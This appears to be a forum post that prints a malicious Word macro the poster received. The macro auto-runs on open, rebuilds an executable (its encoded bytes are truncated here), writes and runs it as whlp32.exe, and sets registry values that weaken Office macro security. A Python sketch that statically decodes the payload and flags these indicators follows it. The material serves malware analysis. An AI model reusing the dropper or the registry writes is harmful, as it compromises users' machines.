Code:
Rem Attribute VBA_ModuleType=VBADocumentModule
Sub ThisDocument
Rem Const iSymbols = 45297
Rem Const iBlockCount = 158
Rem Dim b(1 To 158) As String
Rem
Rem Private Sub Shellcode()
Rem b(1) = "77|90|144|0|1|0|0|0|4|0|16|0|255|255|0|0|184|0|0|0|0|0|0|0|64|0|0|0|0|0|..."
Rem End Sub
Rem
Rem Private Sub MyMessage()
Rem End Sub
Rem
Rem
Rem Private Sub Loader()
Rem Dim dumpfile As String: Dim exefile As String
Rem Dim i As Long
Rem Call Shellcode
Rem For i = 1 To iBlockCount
Rem dumpfile = dumpfile & b(i)
Rem Next i
Rem Dim parsearr() As String: parsearr = Split(dumpfile, "|", -1, vbTextCompare)
Rem For i = 0 To iSymbols - 1
Rem exefile = exefile & Chr(parsearr(i))
Rem Next i
Rem Dim NameOfLocalFile As String: Dim PathOfWriteDir As String: Dim DatNr As Integer
Rem NameOfLocalFile = "whlp32.exe"
Rem PathOfWriteDir = Environ("USERPROFILE")
Rem ChDrive (PathOfWriteDir): ChDir (PathOfWriteDir): DatNr = FreeFile(): Open NameOfLocalFile For Binary Access Read Write As DatNr
Rem Put #1, , exefile
Rem Close #1
Rem Shell (NameOfLocalFile)
Rem Call DisableSecurity
Rem Call MyMessage
Rem End Sub
Rem
Rem Private Sub Document_Open()
Rem Call Loader
Rem End Sub
Rem
Rem Private Sub DisableSecurity()
Rem Dim objShell: Set objShell = CreateObject("WScript.Shell"): On Error Resume Next
Rem objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security\Level", 1, "REG_DWORD"
Rem objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Excel\Security\Level", 1, "REG_DWORD"
Rem objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Excel\Security\Level", 1, "REG_DWORD"
Rem objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
Rem objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security\Level", 1, "REG_DWORD"
Rem objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security\Level", 1, "REG_DWORD"
Rem objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Security\Level", 1, "REG_DWORD"
Rem objShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
Rem End Sub
Rem
Rem
End Sub
The "Rem"s at the beginning of each line actually disable the whole code - I wonder if that was automatically done by OpenOffice (which I used for opening the file).
The b()="..." is a sequence of ASCII codes - according to the number of "0" characters in there it's probably a binary executable.
This is the most bloated, fucked up and insulting "virus" I've ever received... If I wasn't running Linux, I'd probably be scared.
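A static triage sketch for a macro dump of this shape, added here as an example and not part of the original post: it strips the `Rem` prefixes, decodes the `b(n)` decimal strings in memory only, checks for the `MZ` executable magic (the visible `77|90` prefix), and flags the auto-run, `Shell` and macro-security `RegWrite` lines. The function names and the sample text are assumptions constructed from the visible lines above; `AutoOpen` and `Workbook_Open` are common auto-run names added beyond what the post shows.

```python
import re

# Constructed sample: a few lines in the shape of the dump above. The b(1)
# string is only the prefix visible in the post; the rest is elided ("...").
SAMPLE = '''\
Rem Private Sub Shellcode()
Rem b(1) = "77|90|144|0|1|0|0|0|4|0|16|0|255|255|0|0|184|0|0|0|..."
Rem End Sub
Rem Private Sub Document_Open()
Rem Call Loader
Rem End Sub
Rem Shell (NameOfLocalFile)
Rem objShell.RegWrite "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\12.0\\Word\\Security\\VBAWarnings", 1, "REG_DWORD"
'''

BLOCK_RE = re.compile(r'\bb\((\d+)\)\s*=\s*"([^"]*)"')
INDICATORS = {
    "auto_exec": re.compile(r"\bSub\s+(Document_Open|AutoOpen|Workbook_Open)\b", re.I),
    "process_launch": re.compile(r"^\s*Shell\b", re.I | re.M),
    "macro_security_write": re.compile(
        r"RegWrite\s+\"[^\"]*\\Security\\(Level|VBAWarnings)\"", re.I),
}

def strip_rem(source):
    """Drop the leading 'Rem ' that the dump above carries on each line."""
    return "\n".join(re.sub(r"^\s*Rem\b ?", "", ln) for ln in source.splitlines())

def decode_blocks(source):
    """Join b(n) strings in index order and decode '|'-separated decimals in memory."""
    blocks = sorted((int(n), s) for n, s in BLOCK_RE.findall(source))
    tokens = "".join(s for _, s in blocks).split("|")
    # Skip elision markers or junk; keep only values that fit in one byte.
    return bytes(int(t) for t in tokens if t.isdecimal() and int(t) < 256)

def triage(source):
    """Return static findings; nothing is written to disk or executed."""
    text = strip_rem(source)
    payload = decode_blocks(text)
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    return {"payload_len": len(payload),
            "is_mz": payload[:2] == b"MZ",
            "indicators": hits}

if __name__ == "__main__":
    print(triage(SAMPLE))
```
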